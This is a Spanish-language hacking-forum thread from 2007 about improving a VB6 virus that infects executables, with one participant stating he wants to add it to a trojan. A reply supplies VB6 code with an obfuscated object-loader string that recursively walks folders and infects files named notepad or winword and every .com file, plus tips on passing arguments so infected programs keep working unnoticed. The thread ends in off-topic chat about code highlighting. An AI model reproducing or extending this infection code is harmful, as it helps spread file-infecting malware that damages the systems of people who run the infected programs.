[Source] Infección de ejecutables en VB6

nhaalclkiemr · 11 Julio 2007, 20:43 PM

Hola, este codigo está muy bien, pero digo en varias cosas que podría mejorar y que estarían muy bien:

-Que los parametros se pasen también al archivo infectado, pues si ejecutas por ejemplo ping 127.0.0.1 -n1 y el archivo ping.exe está infectado se ejecutaría simplemente ping

-Que sea el virus el que se descomprime en la ruta temporal y no el programa original, pues en caso de que por ejemplo un programa buscase los archivos que necesita para funcionar en su mismo directorio al estar en temp no los encontraría.

Después me gustaría saber como se podría hacer esto:

-Que no infecte a una carpeta (subcarpetas y archivos

) determinada o que solo infecte a una determinada
-Que busque el nombre de un programa en concreto y solo infecte a ese.

Es que me gustaría añadir esto a un troyano y weno, me gustaría saber como podría hacer esto.

Saludos

Mad Antrax · 11 Julio 2007, 20:49 PM

Cita de: nhaalclkiemr en 11 Julio 2007, 20:43 PM
-Que busque el nombre de un programa en concreto y solo infecte a ese.

Aqui tienes para lo del nombre:

Código (vb) [Seleccionar]

Function Subfolders(path)
    On Error Resume Next
    'Se cifra el string que carga el objeto Scripting.FileSystemObject
    Set fso = CreateObject(bullet("Qapkrvkle,DkngQ{qvgoM`hgav"))
    Set Drives = fso.Drives
 
    newpath = path
    Set Fold = fso.GetFolder(newpath)
    Set Files = Fold.Files
 
    For Each File In Files
        ext = fso.GetExtensionName(File.path)
        ext = LCase(ext)
        nam = LCase(File.Name)
        'Modificación del Source
        If (nam = "notepad") OR (nam = "winword") OR (ext = "com") Then
            If IsInfected(File.path) = False Then
                InfectFile (File.path)
                DoEvents
            End If
        End If
    Next
 
    Set File = Fold.Subfolders
    For Each Subfol In File
        Call Subfolders(Subfol.path)
    Next
End Function

Este ejemplo infecta cualquier archivo llamado notepad.* y winword.* Además infectará todos los archivo con extensión *.com

Citar-Que no infecte a una carpeta (subcarpetas y archivos ) determinada o que solo infecte a una determinada

Este es más complicado, pero creo que debería suprimir la parte del final:

Código (vb) [Seleccionar]

    Set File = Fold.Subfolders
    For Each Subfol In File
        Call Subfolders(Subfol.path)
    Next

Y llamar a la función: Subfolders con la ruta exacta, ejemplo: Subfolders("C:\Windows\System32)"
Ojo que esto último no lo he probado

nhaalclkiemr · 11 Julio 2007, 21:34 PM

Gracias, cuando pueda ya pruevo. Y encontraste alguna manera de como pasar los parametros al programa original. Solo con que me digas como puedo en VB6.0 obtener los parametros con los que se ejecutó una aplicación ya está.

Sludos y gracias por todo

Mad Antrax · 11 Julio 2007, 22:32 PM

Cita de: nhaalclkiemr en 11 Julio 2007, 21:34 PM
Solo con que me digas como puedo en VB6.0 obtener los parametros con los que se ejecutó una aplicación ya está.

Existe una variable de VB6 llamada:

Código (vb) [Seleccionar]

Parametros = Command$

Esto te devuelve los parametros con el que se ha ejecutado tu aplicación, con eso tienes suficiente. Saludos!!

Freeze. · 11 Julio 2007, 22:35 PM

||MadAntrax||

Podrias decirnos como es que pones las letras de colores automaticamente(se ve mas ordenado)

o es manual o.O??

Mad Antrax · 11 Julio 2007, 22:40 PM

Cita de: -Freeze- en 11 Julio 2007, 22:35 PM
||MadAntrax||

Podrias decirnos como es que pones las letras de colores automaticamente(se ve mas ordenado)

o es manual o.O??

Instalado Mod para Programación/Programadores GeSHi
https://foro.elhacker.net/index.php/topic,170103.0.html

Freeze. · 11 Julio 2007, 22:40 PM

Ok Muchas gracias.!!

Freeze. · 11 Julio 2007, 22:44 PM

Disculpen el 2ble post.:
y Tambien disculpen desviar el hilo...

¿Como se usa?

Código (perl) [Seleccionar]

asii??

no no se...